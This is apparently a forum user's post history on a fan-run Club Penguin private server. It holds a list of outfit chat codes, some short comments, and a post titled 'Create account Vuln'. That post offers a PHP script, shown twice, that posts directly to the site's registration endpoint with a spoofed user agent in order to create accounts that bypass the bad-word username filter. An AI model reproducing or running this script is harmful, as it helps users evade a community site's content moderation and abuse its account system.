jdfr03's Posts
Posted in
Some OldCP Outfit Codes
•
18th April 2015, 07:47 PM
Hello and here are some codes for outfits!
These codes can work by typing in /outfit
in the chat bar. Some of these are very complicated with underscores so it is suggested
1. FrankyOld: This will turn you into Franky but with is old outfit.
2. FrankyNew: This will turn you into the modern Franky.
3. drivecar: You'll have a car.
4. dealwithit_car: You'll be driving like a boss.
5. show_host: You'll be dressed into very formal clothes
6. santa_claus: This will turn you into Santa!
7. medieval_knight: You turn into a knight. Go fight a dragon!
8. link_thelegendofzelda: This will turn you into Link from The Legend of Zelda!
9. pokemon_red: This will turn you into Red from Pokemon Red! It comes with a Charmander puffle! (Which I mean an orange puffle)
Thats all of the codes I made. Hope you like them!
1. FrankyOld: This will turn you into Franky but with is old outfit.
2. FrankyNew: This will turn you into the modern Franky.
3. drivecar: You'll have a car.
4. dealwithit_car: You'll be driving like a boss.
5. show_host: You'll be dressed into very formal clothes
6. santa_claus: This will turn you into Santa!
7. medieval_knight: You turn into a knight. Go fight a dragon!
8. link_thelegendofzelda: This will turn you into Link from The Legend of Zelda!
9. pokemon_red: This will turn you into Red from Pokemon Red! It comes with a Charmander puffle! (Which I mean an orange puffle)
Thats all of the codes I made. Hope you like them!
5
Posted in
Create account Vuln
•
11th April 2015, 06:25 PM
Is this helpful?
<?php
/*
* A quick PHP script which allows you create accounts with out the bad word filter
* use it responsibily.
*
* Created by TimeLock.
* 11/04/2015
*
*/
class OldCP_Create
{
public function __construct($username, $password)
{
$this->username = $username;
$this->password = $password;
}
public function createAccount()
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_URL, 'http://play.oldcp.biz/join/php/regServ.php');
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60");
$createArray = array(
"name" => $this->username,
"password" => $this->password,
"color" => rand(1, 13)
);
curl_setopt($curl, CURLOPT_POSTFIELDS, $createArray);
$response = curl_exec($curl);
$this->parseResponse($response);
}
private function parseResponse($responseData)
{
$responseSplit = explode("&", $responseData)[0];
$responseType = explode("=", $responseSplit)[0];
if($responseType == "error")
{
$responseError = explode("=", $responseSplit)[1];
echo "[Error]: " . str_replace("Username", $this->username, $responseError) . "\n";
}
if($responseType == "name")
{
echo "[Success]: Successfully created the account!\n";
}
}
}
$create = new OldCP_Create("Username", "Password");
$create->createAccount();
?>
/*
* A quick PHP script which allows you create accounts with out the bad word filter
* use it responsibily.
*
* Created by TimeLock.
* 11/04/2015
*
*/
class OldCP_Create
{
public function __construct($username, $password)
{
$this->username = $username;
$this->password = $password;
}
public function createAccount()
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_URL, 'http://play.oldcp.biz/join/php/regServ.php');
curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60");
$createArray = array(
"name" => $this->username,
"password" => $this->password,
"color" => rand(1, 13)
);
curl_setopt($curl, CURLOPT_POSTFIELDS, $createArray);
$response = curl_exec($curl);
$this->parseResponse($response);
}
private function parseResponse($responseData)
{
$responseSplit = explode("&", $responseData)[0];
$responseType = explode("=", $responseSplit)[0];
if($responseType == "error")
{
$responseError = explode("=", $responseSplit)[1];
echo "[Error]: " . str_replace("Username", $this->username, $responseError) . "\n";
}
if($responseType == "name")
{
echo "[Success]: Successfully created the account!\n";
}
}
}
$create = new OldCP_Create("Username", "Password");
$create->createAccount();
?>
1
Posted in
LEGO Empire Pictures
•
11th April 2015, 06:13 PM
Love it! If it's online, I can totally help test it!
0
Posted in
OldCP World War[Snowball Event]
•
11th April 2015, 01:07 PM
Cool! Can't wait! I want Doritos.
0
Posted in
DSGHQ Spring Ball
•
31st March 2015, 06:40 PM
I'll try to come. No school due to Good Friday.
0